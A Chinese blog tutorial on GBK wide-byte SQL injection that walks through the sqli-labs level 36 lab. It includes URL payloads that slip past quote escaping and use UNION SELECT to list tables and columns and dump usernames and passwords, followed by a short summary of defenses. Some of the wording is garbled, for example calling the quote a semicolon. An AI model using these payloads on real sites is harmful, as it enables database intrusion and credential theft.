【sql注入】宽字节注入详解

一.宽字节注入

1.什么是宽字节?

  计算机底层由二进制存储数据,不同的编码映射着不同的二进制数据,我们以8位二进制为单字节,也称标准字节。宽字节指比标准字节有更多的字节
常见的单字节编码:ASCII
常见的宽字节编码:GB2312,GBK,GB18030,BIG5等
以GBK为例,它以2个字节进行编码

2.宽字节注入原理

这里我们以GBK的宽字节注入为例子。
在有了动态sql语句,和用户可控制的参数的常见sql注入前提下还有另外两个前提
前提1:
  mysql数据库使用GBK编码,此时表中的数据将会以GBK的编码进行存储和识别,这为后期进行宽字节注入打下基础。
前提2:
  服务端对用户输入的敏感数据进行了转义,如利用mysql_real_escape_string()等函数,它会对用户输入的/?id=1’转换为/?id=1\',这样的目的是为了防止sql注入构造闭合.

  这时我们可以利用宽字节注入来进行绕过,在/?id=1’里加上/?id=1%84’,当这串数据传送至数据库时(此时id=1%84\'),由于使用的GBK编码,它是2个字节的编码,所以它会将’%84\‘解析为’刓’,此时成功构成闭合,下面就利用常规的注入手法进行sql注入
提问:为什么%84’会被解析为’刓‘
  因为url编码为%84是两个16进制,为一个字节,\同样为一个字节(php默认传递为utf-8编码),sql语句传递到数据库后,由于数据库为gnk编码,此时它以gbk编码的标准来进行解析,所以被解析为了刓。
另外补充知识,可以参考一下这个博主写的一些:
在这里插入图片描述
在这里插入图片描述

二.sqli-labs-36关

下面以这个实例进行讲解:
输入id=1可正常回显数据

在这里插入图片描述
输入分号正常返回,没有报错,查看提示后发现分号被进行了转义
在这里插入图片描述
分号前加上%83进行宽字节注入,成功报错,说明sql语句以分号进行闭合。在这里插入图片描述
绕过后就可以进行正常的sql注入攻击了

?id=-1%83%27%20union%20select%201,database(),3%20--+
 
?id=-1%83%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+     爆表
 
?id=-1%83%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database() and table_name=0x7573657273--+   爆字段
 
?id=-1%83%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

成功爆出用户密码:
在这里插入图片描述

  • 6
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入宽字节注入都是常见的安全漏洞类型。下面我将简要介绍这两种注入方式。 1. SQL注入SQL注入是一种在应用程序中利用不正确处理用户输入的漏洞,攻击者可以通过在用户输入中插入恶意的SQL代码来执行非授权的数据库操作。这可能导致数据泄露、数据篡改、绕过认证、获取系统权限等问题。 预防SQL注入的措施包括: - 使用参数化查询或预编译语句来处理数据库查询,而不是直接拼接用户输入的数据。 - 对用户输入进行严格的验证和过滤,避免将未经处理的输入直接传递给数据库查询。 - 最小化数据库用户的权限,并且仅分配最低必要的权限。 2. 宽字节注入宽字节注入是一种特定于某些数据库和编码方式的注入攻击方法。它利用了某些编码方式对特殊字符的处理不当,从而绕过了应用程序对输入进行过滤和验证的机制。攻击者可以通过插入宽字节字符来篡改SQL语句或绕过认证。 预防宽字节注入的措施包括: - 使用合适的编码方式,例如UTF-8,以避免特殊字符被误解释。 - 进行输入验证和过滤,确保特殊字符被正确处理,不会导致SQL语句的非预期解析。 - 定期更新数据库和应用程序框架,以修复已知的宽字节注入漏洞。 总的来说,要防止SQL注入宽字节注入等安全漏洞,应该采取综合性的安全措施,包括输入验证、参数化查询、最小权限原则、使用最新版本的软件以及定期进行安全审计和漏洞扫描。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值